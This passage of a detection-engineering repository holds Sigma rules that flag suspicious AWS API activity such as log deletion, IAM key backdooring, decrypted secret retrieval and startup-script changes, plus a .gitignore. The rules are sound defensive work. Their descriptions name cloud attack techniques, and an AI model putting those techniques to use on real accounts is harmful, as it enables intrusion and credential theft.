53 Resolver query logging configurations, which can disrupt DNS logging and hinder security monitoring. 5 | references: 6 | - https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.dns-delete-logs/ 7 | - https://docs.aws.amazon.com/Route53/latest/APIReference/API_DeleteResolverQueryLogConfig.html 8 | author: adanalvarez 9 | date: 2025-04-12 10 | modified: 2025-04-12 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1562.002 14 | logsource: 15 | product: aws 16 | service: route53resolver 17 | detection: 18 | selection: 19 | eventSource: route53resolver.amazonaws.com 20 | eventName: DeleteResolverQueryLogConfig 21 | condition: selection 22 | falsepositives: 23 | - Legitimate administrative actions removing obsolete DNS query logging configurations 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_disable_encryption.yml: -------------------------------------------------------------------------------- 1 | title: AWS EC2 Disable EBS Encryption 2 | id: 16124c2d-e40b-4fcc-8f2c-5ab7870a2223 3 | status: stable 4 | description: | 5 | Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. 6 | Disabling default encryption does not change the encryption status of your existing volumes. 7 | references: 8 | - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html 9 | author: Sittikorn S 10 | date: 2021-06-29 11 | modified: 2021-08-20 12 | tags: 13 | - attack.impact 14 | - attack.t1486 15 | - attack.t1565 16 | logsource: 17 | product: aws 18 | service: cloudtrail 19 | detection: 20 | selection: 21 | eventSource: ec2.amazonaws.com 22 | eventName: DisableEbsEncryptionByDefault 23 | condition: selection 24 | falsepositives: 25 | - System Administrator Activities 26 | - DEV, UAT, SAT environment. You should apply this rule with PROD account only. 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_startup_script_change.yml: -------------------------------------------------------------------------------- 1 | title: AWS EC2 Startup Shell Script Change 2 | id: 1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df 3 | status: test 4 | description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up. 5 | references: 6 | - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9 7 | author: faloker 8 | date: 2020-02-12 9 | modified: 2022-06-07 10 | tags: 11 | - attack.execution 12 | - attack.t1059.001 13 | - attack.t1059.003 14 | - attack.t1059.004 15 | logsource: 16 | product: aws 17 | service: cloudtrail 18 | detection: 19 | selection_source: 20 | eventSource: ec2.amazonaws.com 21 | requestParameters.attribute: 'userData' 22 | eventName: ModifyInstanceAttribute 23 | condition: selection_source 24 | falsepositives: 25 | - Valid changes to the startup script 26 | level: high 27 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_iam_s3browser_loginprofile_creation.yml: -------------------------------------------------------------------------------- 1 | title: AWS IAM S3Browser LoginProfile Creation 2 | id: db014773-b1d3-46bd-ba26-133337c0ffee 3 | status: test 4 | description: Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile. 5 | references: 6 | - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor 7 | author: daniel.bohannon@permiso.io (@danielhbohannon) 8 | date: 2023-05-17 9 | tags: 10 | - attack.execution 11 | - attack.persistence 12 | - attack.t1059.009 13 | - attack.t1078.004 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: 'iam.amazonaws.com' 20 | eventName: 21 | - 'GetLoginProfile' 22 | - 'CreateLoginProfile' 23 | userAgent|contains: 'S3 Browser' 24 | condition: selection 25 | falsepositives: 26 | - Valid usage of S3 Browser for IAM LoginProfile listing and/or creation 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_ssm_malicious_usage.yml: -------------------------------------------------------------------------------- 1 | title: Potential Malicious Usage of CloudTrail System Manager 2 | id: 38e7f511-3f74-41d4-836e-f57dfa18eead 3 | status: experimental 4 | description: | 5 | Detect when System Manager successfully executes commands against an instance. 6 | references: 7 | - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/initial_access_via_system_manager.toml 8 | author: jamesc-grafana 9 | date: 2024-07-11 10 | tags: 11 | - attack.privilege-escalation 12 | - attack.t1566 13 | - attack.t1566.002 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventName: 'SendCommand' 20 | eventSource: 'ssm.amazonaws.com' 21 | responseElements.command.status: 'Success' 22 | condition: selection 23 | falsepositives: 24 | - There are legitimate uses of SSM to send commands to EC2 instances 25 | - Legitimate users may have to use SSM to perform actions against machines in the Cloud to update or maintain them 26 | level: high 27 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_update_login_profile.yml: -------------------------------------------------------------------------------- 1 | title: AWS User Login Profile Was Modified 2 | id: 055fb148-60f8-462d-ad16-26926ce050f1 3 | status: test 4 | description: | 5 | Detects activity when someone is changing passwords on behalf of other users. 6 | An attacker with the "iam:UpdateLoginProfile" permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. 7 | references: 8 | - https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation 9 | author: toffeebr33k 10 | date: 2021-08-09 11 | modified: 2024-04-26 12 | tags: 13 | - attack.persistence 14 | - attack.t1098 15 | logsource: 16 | product: aws 17 | service: cloudtrail 18 | detection: 19 | selection: 20 | eventSource: 'iam.amazonaws.com' 21 | eventName: 'UpdateLoginProfile' 22 | filter_main_user_identity: 23 | userIdentity.arn|fieldref: requestParameters.userName 24 | condition: selection and not 1 of filter_main_* 25 | falsepositives: 26 | - Legitimate user account administration 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_eks_cluster_created_or_deleted.yml: -------------------------------------------------------------------------------- 1 | title: AWS EKS Cluster Created or Deleted 2 | id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 3 | status: test 4 | description: Identifies when an EKS cluster is created or deleted. 5 | references: 6 | - https://any-api.com/amazonaws_com/eks/docs/API_Description 7 | author: Austin Songer 8 | date: 2021-08-16 9 | modified: 2022-10-09 10 | tags: 11 | - attack.impact 12 | - attack.t1485 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: eks.amazonaws.com 19 | eventName: 20 | - CreateCluster 21 | - DeleteCluster 22 | condition: selection 23 | falsepositives: 24 | - EKS Cluster being created or deleted may be performed by a system administrator. 25 | - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. 26 | - EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 27 | level: low 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ssm_ssmgetparameter.yml: -------------------------------------------------------------------------------- 1 | title: AWS SSM GetParameter(s) with Decryption 2 | id: 3c4d5e6f-7a8b-9c0d-1e2f-3a4b5c6d7e8f 3 | status: test 4 | description: Detects usage of the GetParameter and GetParameters API calls with the withDecryption flag set to true, which retrieves decrypted SecureString parameters from AWS Systems Manager Parameter Store. 5 | references: 6 | - https://stratus-red-team.cloud/attack-techniques/AWS/aws.credential-access.ssm-retrieve-securestring-parameters/ 7 | - https://docs.aws.amazon.com/systems-manager/latest/APIReference/API_GetParameter.html 8 | - https://docs.aws.amazon.com/systems-manager/latest/APIReference/API_GetParameters.html 9 | author: adanalvarez 10 | date: 2025-04-12 11 | modified: 2025-04-12 12 | tags: 13 | - attack.credential_access 14 | - attack.t1552 15 | logsource: 16 | product: aws 17 | service: ssm 18 | detection: 19 | selection: 20 | eventSource: ssm.amazonaws.com 21 | eventName: 22 | - GetParameter 23 | - GetParameters 24 | condition: selection 25 | falsepositives: 26 | - Legitimate administrative actions retrieving SecureString parameters with decryption 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_s3_lifecycle.yml: -------------------------------------------------------------------------------- 1 | title: AWS S3 Lifecycle Rule with Short Expiration on CloudTrail Bucket 2 | id: 4d5e6f7a-8b9c-0d1e-2f3a-4b5c6d7e8f9g 3 | status: test 4 | description: Detects the application of an S3 Lifecycle Rule with a short expiration period on the S3 bucket used by AWS CloudTrail, which could lead to premature deletion of log files. 5 | references: 6 | - https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/ 7 | - https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html 8 | author: adanalvarez 9 | date: 2025-04-12 10 | modified: 2025-04-12 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1562.001 14 | logsource: 15 | product: aws 16 | service: s3 17 | category: management 18 | detection: 19 | selection: 20 | eventSource: s3.amazonaws.com 21 | eventName: PutBucketLifecycleConfiguration 22 | requestParameters.lifecycleConfiguration.rules: 23 | - expiration: 24 | days: 1 25 | condition: selection 26 | falsepositives: 27 | - Legitimate administrative actions setting short expiration periods for specific operational needs 28 | level: high 29 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_enum_buckets.yml: -------------------------------------------------------------------------------- 1 | title: Potential Bucket Enumeration on AWS 2 | id: f305fd62-beca-47da-ad95-7690a0620084 3 | related: 4 | - id: 4723218f-2048-41f6-bcb0-417f2d784f61 5 | type: similar 6 | status: test 7 | description: Looks for potential enumeration of AWS buckets via ListBuckets. 8 | references: 9 | - https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md 10 | - https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html 11 | - https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/ 12 | author: Christopher Peacock @securepeacock, SCYTHE @scythe_io (modified by adanalvarez) 13 | date: 2023-01-06 14 | modified: 2024-07-10 15 | tags: 16 | - attack.discovery 17 | - attack.t1580 18 | logsource: 19 | product: aws 20 | service: cloudtrail 21 | detection: 22 | selection: 23 | eventSource: 's3.amazonaws.com' 24 | eventName: 'ListBuckets' 25 | condition: selection 26 | falsepositives: 27 | - Administrators listing buckets, it may be necessary to filter out users who commonly conduct this activity. 28 | level: low 29 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_passed_role_to_glue_development_endpoint.yml: -------------------------------------------------------------------------------- 1 | title: AWS Glue Development Endpoint Activity 2 | id: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 3 | status: test 4 | description: Detects possible suspicious glue development endpoint activity. 5 | references: 6 | - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ 7 | - https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html 8 | author: Austin Songer @austinsonger 9 | date: 2021-10-03 10 | modified: 2022-12-18 11 | tags: 12 | - attack.privilege-escalation 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: 'glue.amazonaws.com' 19 | eventName: 20 | - 'CreateDevEndpoint' 21 | - 'DeleteDevEndpoint' 22 | - 'UpdateDevEndpoint' 23 | condition: selection 24 | falsepositives: 25 | - Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. 26 | - If known behavior is causing false positives, it can be exempted from the rule. 27 | level: low 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_elasticache_security_group_created.yml: -------------------------------------------------------------------------------- 1 | title: AWS ElastiCache Security Group Created 2 | id: 4ae68615-866f-4304-b24b-ba048dfa5ca7 3 | status: test 4 | description: Detects when an ElastiCache security group has been created. 5 | references: 6 | - https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml 7 | author: Austin Songer @austinsonger 8 | date: 2021-07-24 9 | modified: 2022-10-09 10 | tags: 11 | - attack.persistence 12 | - attack.t1136 13 | - attack.t1136.003 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: elasticache.amazonaws.com 20 | eventName: 'CreateCacheSecurityGroup' 21 | condition: selection 22 | falsepositives: 23 | - A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 24 | 25 | 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_import_key_pair_activity.yml: -------------------------------------------------------------------------------- 1 | title: AWS Key Pair Import Activity 2 | id: 92f84194-8d9a-4ee0-8699-c30bfac59780 3 | status: experimental 4 | description: | 5 | Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations. 6 | references: 7 | - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ImportKeyPair.html 8 | author: Ivan Saakov 9 | date: 2024-12-19 10 | tags: 11 | - attack.initial-access 12 | - attack.t1078 13 | - attack.persistence 14 | - attack.privilege-escalation 15 | logsource: 16 | product: aws 17 | service: cloudtrail 18 | detection: 19 | selection: 20 | eventSource: 'ec2.amazonaws.com' 21 | eventName: 'ImportKeyPair' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate administrative actions by authorized users importing keys for valid purposes. 25 | - Automated processes for infrastructure setup may trigger this alert. 26 | - Verify the user identity, user agent, and source IP address to ensure they are expected. 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_security_group_change_rds.yml: -------------------------------------------------------------------------------- 1 | title: RDS Database Security Group Modification 2 | id: 14f3f1c8-02d5-43a2-a191-91ffb52d3015 3 | status: test 4 | description: | 5 | Detects changes to the security group entries for RDS databases. 6 | This can indicate that a misconfiguration has occurred which potentially exposes the database to the public internet, a wider audience within the VPC or that removal of valid rules has occurred which could impact the availability of the database to legitimate services and users. 7 | references: 8 | - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ 9 | author: jamesc-grafana 10 | date: 2024-07-11 11 | tags: 12 | - attack.initial-access 13 | - attack.t1190 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: 'rds.amazonaws.com' 20 | eventName: 21 | - 'AuthorizeDBSecurityGroupIngress' 22 | - 'CreateDBSecurityGroup' 23 | - 'DeleteDBSecurityGroup' 24 | - 'RevokeDBSecurityGroupIngress' 25 | condition: selection 26 | falsepositives: 27 | - Creation of a new Database that needs new security group rules 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_rds_dbcluster_actions.yml: -------------------------------------------------------------------------------- 1 | title: Modification or Deletion of an AWS RDS Cluster 2 | id: 457cc9ac-d8e6-4d1d-8c0e-251d0f11a74c 3 | status: experimental 4 | description: Detects modifications to an RDS cluster or its deletion, which may indicate potential data exfiltration attempts, unauthorized access, or exposure of sensitive information. 5 | references: 6 | - https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBCluster.html 7 | - https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html 8 | - https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance 9 | author: Ivan Saakov 10 | date: 2024-12-06 11 | tags: 12 | - attack.exfiltration 13 | - attack.t1020 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: rds.amazonaws.com 20 | eventName: 21 | - ModifyDBCluster 22 | - DeleteDBCluster 23 | condition: selection 24 | falsepositives: 25 | - Verify if the modification or deletion was performed by an authorized administrator. 26 | - Confirm if the modification or deletion was part of a planned change or maintenance activity. 27 | level: high 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_security_group_change_loadbalancer.yml: -------------------------------------------------------------------------------- 1 | title: LoadBalancer Security Group Modification 2 | id: 7a4409fc-f8ca-45f6-8006-127d779eaad9 3 | status: test 4 | description: | 5 | Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB). 6 | This can indicate that a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account. 7 | references: 8 | - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ 9 | author: jamesc-grafana 10 | date: 2024-07-11 11 | tags: 12 | - attack.initial-access 13 | - attack.t1190 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: 'elasticloadbalancing.amazonaws.com' 20 | eventName: 21 | - 'ApplySecurityGroupsToLoadBalancer' 22 | - 'SetSecurityGroups' 23 | condition: selection 24 | falsepositives: 25 | - Repurposing of an ELB or ALB to serve a different or additional application 26 | - Changes to security groups to allow for new services to be deployed 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_route_53_domain_transferred_to_another_account.yml: -------------------------------------------------------------------------------- 1 | title: AWS Route 53 Domain Transferred to Another Account 2 | id: b056de1a-6e6e-4e40-a67e-97c9808cf41b 3 | status: test 4 | description: Detects when a request has been made to transfer a Route 53 domain to another AWS account. 5 | references: 6 | - https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml 7 | author: Elastic, Austin Songer @austinsonger 8 | date: 2021-07-22 9 | modified: 2022-10-09 10 | tags: 11 | - attack.persistence 12 | - attack.credential-access 13 | - attack.t1098 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: route53.amazonaws.com 20 | eventName: TransferDomainToAnotherAwsAccount 21 | condition: selection 22 | falsepositives: 23 | - A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 24 | level: low 25 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_sts_getsessiontoken_misuse.yml: -------------------------------------------------------------------------------- 1 | title: AWS STS GetSessionToken Misuse 2 | id: b45ab1d2-712f-4f01-a751-df3826969807 3 | status: test 4 | description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. 5 | references: 6 | - https://github.com/elastic/detection-rules/pull/1213 7 | - https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html 8 | author: Austin Songer @austinsonger 9 | date: 2021-07-24 10 | modified: 2022-10-09 11 | tags: 12 | - attack.lateral-movement 13 | - attack.privilege-escalation 14 | - attack.t1548 15 | - attack.t1550 16 | - attack.t1550.001 17 | logsource: 18 | product: aws 19 | service: cloudtrail 20 | detection: 21 | selection: 22 | eventSource: sts.amazonaws.com 23 | eventName: GetSessionToken 24 | userIdentity.type: IAMUser 25 | condition: selection 26 | falsepositives: 27 | - GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 28 | level: low 29 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_iam_backdoor_users_keys.yml: -------------------------------------------------------------------------------- 1 | title: AWS IAM Backdoor Users Keys 2 | id: 0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2 3 | status: test 4 | description: | 5 | Detects AWS API key creation for a user by another user. 6 | Backdoored users can be used to obtain persistence in the AWS environment. 7 | Also with this alert, you can detect a flow of AWS keys in your org. 8 | references: 9 | - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py 10 | author: faloker 11 | date: 2020-02-12 12 | modified: 2022-10-09 13 | tags: 14 | - attack.persistence 15 | - attack.t1098 16 | logsource: 17 | product: aws 18 | service: cloudtrail 19 | detection: 20 | selection_source: 21 | eventSource: iam.amazonaws.com 22 | eventName: CreateAccessKey 23 | filter: 24 | userIdentity.arn|contains: responseElements.accessKey.userName 25 | condition: selection_source and not filter 26 | fields: 27 | - userIdentity.arn 28 | - responseElements.accessKey.userName 29 | - errorCode 30 | - errorMessage 31 | falsepositives: 32 | - Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming) 33 | - AWS API keys legitimate exchange workflows 34 | level: medium 35 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Local .terraform directories 2 | **/.terraform/* 3 | 4 | # .tfstate files 5 | *.tfstate 6 | *.tfstate.* 7 | 8 | # Crash log files 9 | crash.log 10 | crash.*.log 11 | 12 | # Exclude all .tfvars files, which are likely to contain sensitive data, such as 13 | # password, private keys, and other secrets. These should not be part of version 14 | # control as they are data points which are potentially sensitive and subject 15 | # to change depending on the environment. 16 | *.tfvars 17 | 18 | # Ignore override files as they are usually used to override resources locally and so 19 | # are not checked in 20 | override.tf 21 | override.tf.json 22 | *_override.tf 23 | *_override.tf.json 24 | 25 | # Ignore transient lock info files created by terraform apply 26 | .terraform.tfstate.lock.info 27 | 28 | # Include override files you do wish to add to version control using negated pattern 29 | # !example_override.tf 30 | 31 | # Include tfplan files to ignore the plan output of command: terraform plan -out=tfplan 32 | # example: *tfplan* 33 | 34 | # Ignore CLI configuration files 35 | .terraformrc 36 | terraform.rc 37 | 38 | # Pytest 39 | __pycache__/ 40 | *.py[cod] 41 | *$py.class 42 | .pytest_cache/ 43 | .coverage 44 | htmlcov/ 45 | .tox/ 46 | .nox/ 47 | .hypothesis/ 48 | .egg-info/ 49 | 50 | # Lambda layer 51 | lambdas/layer/python/ 52 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_new_lambda_layer_attached.yml: -------------------------------------------------------------------------------- 1 | title: AWS New Lambda Layer Attached 2 | id: 97fbabf8-8e1b-47a2-b7d5-a418d2b95e3d 3 | status: test 4 | description: | 5 | Detects when a user attached a Lambda layer to an existing Lambda function. 6 | A malicious Lambda layer could execute arbitrary code in the context of the function's IAM role. 7 | This would give an adversary access to resources that the function has access to. 8 | references: 9 | - https://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html 10 | - https://github.com/clearvector/lambda-spy 11 | author: Austin Songer 12 | date: 2021-09-23 13 | modified: 2025-03-17 14 | tags: 15 | - attack.privilege-escalation 16 | logsource: 17 | product: aws 18 | service: cloudtrail 19 | detection: 20 | selection: 21 | eventSource: lambda.amazonaws.com 22 | eventName|startswith: 'UpdateFunctionConfiguration' 23 | requestParameters.layers|contains: '*' 24 | condition: selection 25 | falsepositives: 26 | - Lambda Layer being attached may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. 27 | - Lambda Layer being attached from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 28 | level: low 29 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_sso_idp_change.yml: -------------------------------------------------------------------------------- 1 | title: AWS Identity Center Identity Provider Change 2 | id: d3adb3ef-b7e7-4003-9092-1924c797db35 3 | status: test 4 | description: | 5 | Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider. 6 | A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation. 7 | references: 8 | - https://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html 9 | - https://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html 10 | - https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html 11 | author: Michael McIntyre @wtfender 12 | date: 2023-09-27 13 | tags: 14 | - attack.persistence 15 | - attack.t1556 16 | logsource: 17 | product: aws 18 | service: cloudtrail 19 | detection: 20 | selection: 21 | eventSource: 22 | - 'sso-directory.amazonaws.com' 23 | - 'sso.amazonaws.com' 24 | eventName: 25 | - 'AssociateDirectory' 26 | - 'DisableExternalIdPConfigurationForDirectory' 27 | - 'DisassociateDirectory' 28 | - 'EnableExternalIdPConfigurationForDirectory' 29 | condition: selection 30 | falsepositives: 31 | - Authorized changes to the AWS account's identity provider 32 | level: high 33 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_security_group_change_ingress_egress.yml: -------------------------------------------------------------------------------- 1 | title: Ingress/Egress Security Group Modification 2 | id: 6fb77778-040f-4015-9440-572aa9b6b580 3 | status: test 4 | description: | 5 | Detects when an account makes changes to the ingress or egress rules of a security group. 6 | This can indicate that an attacker is attempting to open up new attack vectors in the account, that they are trying to exfiltrate data over the network, or that they are trying to allow machines in that VPC/Subnet to contact a C&C server. 7 | references: 8 | - https://www.gorillastack.com/blog/real-time-events/important-aws-cloudtrail-security-events-tracking/ 9 | author: jamesc-grafana 10 | date: 2024-07-11 11 | tags: 12 | - attack.initial-access 13 | - attack.t1190 14 | logsource: 15 | product: aws 16 | service: cloudtrail 17 | detection: 18 | selection: 19 | eventSource: 'ec2.amazonaws.com' 20 | eventName: 21 | - 'AuthorizeSecurityGroupEgress' 22 | - 'AuthorizeSecurityGroupIngress' 23 | - 'RevokeSecurityGroupEgress' 24 | - 'RevokeSecurityGroupIngress' 25 | condition: selection 26 | falsepositives: 27 | - New VPCs and Subnets being setup requiring a different security profile to those already defined 28 | - A single port being opened for a new service that is known to be deploying 29 | - Administrators closing unused ports to reduce the attack surface 30 | level: medium 31 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_delete_saml_provider.yml: -------------------------------------------------------------------------------- 1 | title: AWS SAML Provider Deletion Activity 2 | id: ccd6a6c8-bb4e-4a91-9d2a-07e632819374 3 | status: experimental 4 | description: | 5 | Detects the deletion of an AWS SAML provider, potentially indicating malicious intent to disrupt administrative or security team access. 6 | An attacker can remove the SAML provider for the information security team or a team of system administrators, to make it difficult for them to work and investigate at the time of the attack and after it. 7 | references: 8 | - https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteSAMLProvider.html 9 | author: Ivan Saakov 10 | date: 2024-12-19 11 | modified: 2025-04-12 # By adanalvarez 12 | tags: 13 | - attack.t1078.004 14 | - attack.privilege-escalation 15 | - attack.t1531 16 | logsource: 17 | product: aws 18 | service: cloudtrail 19 | detection: 20 | selection: 21 | eventSource: 'iam.amazonaws.com' 22 | eventName: 'DeleteSAMLProvider' 23 | condition: selection 24 | falsepositives: 25 | - Automated processes using tools like Terraform may trigger this alert. 26 | - Legitimate administrative actions by authorized system administrators could cause this alert. Verify the user identity, user agent, and hostname to ensure they are expected. 27 | - Deletions by unfamiliar users should be investigated. If the behavior is known and expected, it can be exempted from the rule. 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_elasticache_security_group_modified_or_deleted.yml: -------------------------------------------------------------------------------- 1 | title: AWS ElastiCache Security Group Modified or Deleted 2 | id: 7c797da2-9cf2-4523-ba64-33b06339f0cc 3 | status: test 4 | description: Identifies when an ElastiCache security group has been modified or deleted. 5 | references: 6 | - https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml 7 | author: Austin Songer @austinsonger 8 | date: 2021-07-24 9 | modified: 2022-10-09 10 | tags: 11 | - attack.impact 12 | - attack.t1531 13 | logsource: 14 | product: aws 15 | service: cloudtrail 16 | detection: 17 | selection: 18 | eventSource: elasticache.amazonaws.com 19 | eventName: 20 | - 'DeleteCacheSecurityGroup' 21 | - 'AuthorizeCacheSecurityGroupIngress' 22 | - 'RevokeCacheSecurityGroupIngress' 23 | - 'AuthorizeCacheSecurityGroupEgress' 24 | - 'RevokeCacheSecurityGroupEgress' 25 | condition: selection 26 | falsepositives: 27 | - A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 28 | 29 | 30 | level: low 31 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_susp_saml_activity.yml: -------------------------------------------------------------------------------- 1 | title: AWS Suspicious SAML Activity 2 | id: f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e 3 | status: test 4 | description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML. 5 | references: 6 | - https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html 7 | - https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html 8 | author: Austin Songer 9 | date: 2021-09-22 10 | modified: 2022-12-18 11 | tags: 12 | - attack.initial-access 13 | - attack.t1078 14 | - attack.lateral-movement 15 | - attack.t1548 16 | - attack.privilege-escalation 17 | - attack.t1550 18 | - attack.t1550.001 19 | logsource: 20 | product: aws 21 | service: cloudtrail 22 | detection: 23 | selection_sts: 24 | eventSource: 'sts.amazonaws.com' 25 | eventName: 'AssumeRoleWithSAML' 26 | selection_iam: 27 | eventSource: 'iam.amazonaws.com' 28 | eventName: 'UpdateSAMLProvider' 29 | condition: 1 of selection_* 30 | falsepositives: 31 | - Automated processes that uses Terraform may lead to false positives. 32 | - SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. 33 | - SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. 34 | level: medium 35 | -------------------------------------------------------------------------------- /rules/sigma_rules/aws_route_53_domain_transferred_lock_disabled.yml: -------------------------------------------------------------------------------- 1 | title: AWS Route 53 Domain Transfer Lock Disabled 2 | id: 3940b5f1-3f46-44aa-b746-ebe615b879e0 3 | status: test 4 | description: Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. 5 | references: 6 | - 